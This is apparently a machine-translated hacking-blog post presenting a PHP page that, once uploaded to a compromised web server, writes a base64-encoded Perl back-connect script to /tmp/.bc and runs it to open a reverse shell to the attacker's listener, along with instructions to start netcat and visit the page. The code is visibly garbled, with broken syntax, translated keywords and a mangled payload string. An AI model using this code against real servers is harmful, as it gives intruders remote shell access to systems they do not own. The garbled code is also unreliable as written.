私はとても無力で、良い解決策も思いつきませんでしたが、あるアイデアを思いつきました。 php ページを置くと、直接シェルに戻ることができます。また、コンソールでの操作は、Web シェルを使用するよりもはるかに便利で、タイムアウトなどもありません。
私は PHP のことをよく知らないので、残念な Nono と Xiaoyu にコードの修正を依頼しました。リバウンド コードは phpspy2008 から抽出されましたが、直接使用することはできず、別の PHP ファイルに修正する必要があります。アップロード後、ローカルでポートをリッスンし、コードにリバウンド IP とポートを設定して直接アクセスすると、シェルがポップアップします。
免責事項、技術的な内容はなく、主に利便性を目的としています。こうすることで、他の面倒な操作を行うことなく、毎回この PHP ページに直接アクセスしてシェルに戻ることができます。変更されたコードは以下に掲載されています。
コードをコピーします コードは次のとおりです。
function what($pr) {
$path =execute("that $pr"); >return ($path ? $ path : $pr);
}
関数実行($cfe) {
$res = ''; function_exists('exec')) {
@exec($cfe,$res);
$res = join("n",$res);
} elseif(function_exists('shell_exec')); {
$res = @shell_exec($cfe);
} elseif(function_exists('system')) {
@system($cfe); res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@passthru($cfe); $res = @ob_get_contents() ;
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r")) {
$res = '';
while(!@ feof($f)) {
$res .= @fread($f,1024)
}
@pclose($f); >}
return $ res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@ fputs($fp,@base64_decode ($text));
@fclose($fp)
}
$yourip = "あなたの IP";ポート';
$ usedb = array('perl'=>'perl','c'=>'c'); jaG8gImB1bmF tZSatYWAiO2Vj" 🎜>"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4i KT」。
「sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI」。 FNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi NCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmN sb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/ tmp/.bc',$back_connect);
$ res =execute(どれ('perl ')." /tmp/.bc $yourip $yourport &");
まず nc -l -vv - ローカルで p port を実行してから、この php ページにアクセスしてください://www.site.com/fuck.php を実行すると、ローカルでリバウンド シェルが取得されます。
卑猥な配信限定です 何か良い卑猥な方法がありましたらアドバイスをお願いします。